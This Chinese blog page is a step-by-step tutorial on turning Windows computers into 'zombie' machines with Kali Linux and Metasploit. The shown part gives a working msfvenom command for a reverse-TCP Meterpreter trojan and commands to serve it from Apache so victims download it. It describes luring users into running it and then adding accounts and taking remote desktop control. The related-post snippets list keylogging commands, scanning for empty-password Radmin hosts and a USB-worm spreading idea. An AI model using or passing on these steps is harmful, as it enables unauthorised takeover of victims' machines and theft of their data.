kali linux捉肉鸡教程,使用Kali中的Metasploit生成木马控制Windows系统

最新推荐文章于 2022-07-11 07:34:00 发布
最新推荐文章于 2022-07-11 07:34:00 发布
阅读量1.6k 收藏 22
点赞数 1
文章标签: kali linux捉肉鸡教程
本文介绍了如何在Kali Linux中使用Metasploit框架生成木马并控制Windows系统。首先,通过msfvenom命令生成reverse_tcp类型的木马,并将其上传至Apache服务器。接着,启动Metasploit handler来监听受害者连接。诱导Windows用户下载并执行木马后,Kali系统将获取到Meterpreter shell,从而可以进行进一步的渗透测试,例如添加用户和远程桌面连接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、概念:Kali基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是BT5 R3(BtackTrack)。

其中Metasploit是一个综合利用工具,极大的提高了攻击者的渗透效率,使用Ruby开发的,使用非常方便,进入该工具的方式:msfconsole ,MSF依赖于Postgresql数据库,在使用MSF之前要开启数据库。

二、步骤:

Step1:生成木马,msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=Kali的IP lport=5555 -f exe >/root/Desktop/evilshell.exe

-p 参数后跟上payload,攻击成功后要做什么事情

lhost 后跟监听的IP

lpost 后跟监听端口

-f 后跟要生成后门文件的类型

>重定向

Step2:将生成的木马文件evilshell.exe 拷贝到/var/www/html,开启apache服务,在肉鸡上打开浏览器,访问该站点(Kali的IP),下载木马文件。

cp evilshell.exe /var/www/html/

service apache2 start

Step3:开启MSF,提前查看postgresql运行状态 msfconsole

ps -aux |grep postgresql

msfconsole

exploits:开发利用,用来攻击某些服务、平台、系统等用到的工具

p

最低0.47元/天 解锁文章
TF Lau
关注
[网络安全自学篇] 九十.远控木马详解及APT攻击中的远控和防御
杨秀璋的专栏
07-24 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了软件来源分析,结合APT攻击中常见的判断方法,利用Python调用扩展包进行溯源。这篇文章将详细分享远控木马及APT攻击中的远控,包括木马的基本概念和分类、木马的植入方式、远控木马的通信方式、APT攻击与远控木马等。作者之前分享了多篇木马的文章,但这篇更多是讲解远控型木马,基础性文章,希望对您有所帮助~
Linux公网渗透实验
weixin_44162346的博客
08-31 3567
收集测试网络环境 当我们拿到一台目标内网服务器,或者说肉鸡服务器,首先要做的就是收集信息。而在我看来需要收集的信息中,最重要的之一便是肉鸡的网络环境。 实验环境 首先介绍下本次测试的服务器环境: 攻击机Mac:110.xx.xx.xx 外网 肉鸡centos:192.168.16.x 目标内网16网段系统 内网渗透范围:192.168.17.0/24 目标内网17网段系统 本次测试模拟假设:由...
kali 肉鸡的操作
qq_33391644的博客
02-08 6373
1.屏幕截图命令:screenshot 2.键盘记录命令:keyscan_start   //开启 keyscan_dump //显示键盘记录keyscan_stop //关闭键盘记录3.结束进程命令:Kill 进程4.查看进程命令:ps5.重启电脑命令:Reboot6.关闭电脑命令:Shutdown7.获取电脑信息命令:sysinfo8.音频录音命令:record_mic -d 秒数9.打开窗体...
002-windowa基础(DOS命令:net user 用户 密码 /add)
fiveseven的博客
08-21 4111
002-windowa基础(DOS命令:net user 用户 密码 /add)
kali linux肉鸡教程,简单扫4899端口肉鸡菜鸟教程详细版
weixin_29513805的博客
05-02 3513
简单扫4899端口肉鸡 (菜鸟教程详细版)大家好。我是☆黑色毛衣☆。今天做的是简单扫4899端口肉鸡,只要把工具用好。找端口肉鸡不难可能有些扫135端口的扫描不了。这样就试试4899吧。因为扫135端口有些地方限制了。所以扫描不了。好了,话不多打。我们今次用到的工具有:1.S扫描器 (端口扫描器)2.4899过滤器 (过滤4899端口空密码主机专用)3.radmin (一个远程控制软件)4.免...
linux肉鸡教程视频,超简单的菜鸟网吧肉鸡教程
weixin_39731916的博客
05-03 2731
大家好!我是rockwolf,我这次给大家做的教程是超简单的菜鸟网吧肉鸡教程.首先,需要的工具:1.灰鸽子一个:版本任意2.WebMan:开启HTTP服务的小工具3.啊D网络工具包:这个大家应该很常用的了````不用介绍的了吧`````我的鸽子上线是在本机建立FTP服务器的,大家看我操作.首先,在本机任意目录建立一个做为FTP服务器的文件夹,我为了方便,就在F盘的根目录下建立了.打开灰鸽子,工具...
Kali 下对安卓手机的攻击
热门推荐
m0_66524548的博客
01-29 1万+
写在前面:本文仅限学术交流,请勿用他人实践 Kali对安卓手机的攻击(渗透) 我们首先需要确定本机IP 这很简单,对于Kali来说我们需要打开终端并键入 ifconfig 即可获取自己的IP,然后我们需要确定安卓手机也就是被攻击者的IP,只需键入 fping -g 本机IP地址/24 这时我们就能确定目标IP,这次教程主要围绕创建后门程序展开 在终端中执行: # msfvenom -p android/meterpreter/reverse_tcp LHOST=目标IP LPORT=
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4815
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
linux肉鸡入侵详细教程,一台linux肉鸡的简单手工入侵检测过程
weixin_34824634的博客
05-02 385
* Their use/misuse is at USERS OWN RISK !* We do not take any responsibility for any harm or damage caused* by the use of this file-package.* This includes copying, duplicating or modifying it in any ...
linux肉鸡教程视频,肉鸡教程和软件免费分享(2018一天1000只电脑肉鸡视频)...
weixin_32965503的博客
05-03 1693
大家应该都知道病毒吧!那么有没有想过利用病毒的传播特性来帮我们肉鸡呢?最近网上比较流行的就是U盘病毒。但是经常混迹于各大论坛的朋友应该都知道,网上也介绍了突破自动播放的方法,就是在U盘的根目录下新建一个Autorun.inf文件,内容如下:接下来的工作就是要编写一个程序,首先要让它有传播功能,而且还能够开启中毒电脑的端口以实现控制。我们来实现传播功能,就用VC来实现吧!该程序运行后,可以将自身副...
linux肉鸡入侵详细教程,实战案例【Linux服务器沦陷为肉鸡处理全程实录】视频教程...
weixin_39989190的博客
05-02 641
本课程通过实战教学方式,现场讲解这种Xor.DDoS木马入侵的现象、入侵的方式、入侵的原因和解决防御的措施。1、解决线上Linux服务器故障的思路和方法2、Linux服务器沦陷为肉鸡处理全程实录【问题现象与分析】3、Linux服务器沦陷为肉鸡处理全程实录【故障排查思路】4、Linux服务器沦陷为肉鸡处理全程实录【定位问题与解决】高老师Linux运维实战课程推荐:第一阶段:Linux基础入门篇Lin...
谁可以教我
asdads1561123的专栏
03-16 800
<br />谁可以教我
使用kalimetasploit生成木马控制windows系统
antaping3143的博客
09-20 1514
使用kalimetasploit生成木马控制windows系统 kali基于debin的数字取证系统,上面集成很多渗透测试工具,前身是BT5 R3(bracktrack) 其中metasploit是一个综合利用工具,极大提高攻击者的渗透效率,使用ruby开发的,使用非常方便,进入该工具的方式msfconsole,MSF依赖于postgresql数据库,在使用MSF之前要...
吐血原创-我用“电驴”肉鸡!!!
weixin_34320724的博客
03-12 299
我用“电驴”肉鸡 本文已被***手册杂志2007年第三期收录    我用“电驴”肉鸡!!难道是放一个“电驴”在路上,等“火”过来,一不小心踩在“电驴”上结果给烫熟了,结果就成“肉鸡”了。很多朋友说肉鸡很难,找好肉鸡就更难,其实也不然,关键就在于敢动脑子。没有做不到的事情,只有想不到的事情;“人有多大胆,地有多大产”。闲话少说,且写正传!     (一)肉鸡工具 工欲善其事,必先利...
利用JBOSS漏洞肉鸡
404
01-23 7249
JBOSS是中间件,解析JSP的文件,由于中间件爆发漏洞一般很少人打补丁,这次我们利用jboss漏洞肉鸡。 利用工具:jexboss-master 这个工具是Python写的在我的资源里面已经分享可以下载,也可以自己在github上面寻找 网络搜索引擎:zoomeye(钟馗之眼) 在肉鸡之前我们要明白目标,那就是使用jboss中间件的服务器 进入zoomeye搜索关键词jboss(这
管中窥豹---分析一个只中国肉鸡的DDOS团伙
weixin_33725722的博客
03-08 707
virustracker · 2015/06/17 10:19source:https://blog.malwarebytes.org/intelligence/2015/06/unusual-exploit-kit-targets-chinese-users-part-2/最近,我们的研究人员发现了一个非常奇怪的exploit kit正在攻击中国的域名。在上一篇文章中,我们详细地讨论了这个exp...
kali linux肉鸡教程
最新发布
10-27
Kali Linux肉鸡教程是一种网络安全攻击技术,旨在通过社会工程学攻击和漏洞利用技术获取远程计算机的控制权。以下是一些步骤: 1. 扫描目标网络,找到易受攻击的计算机。 2. 利用漏洞或社会工程学攻击技术,将...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值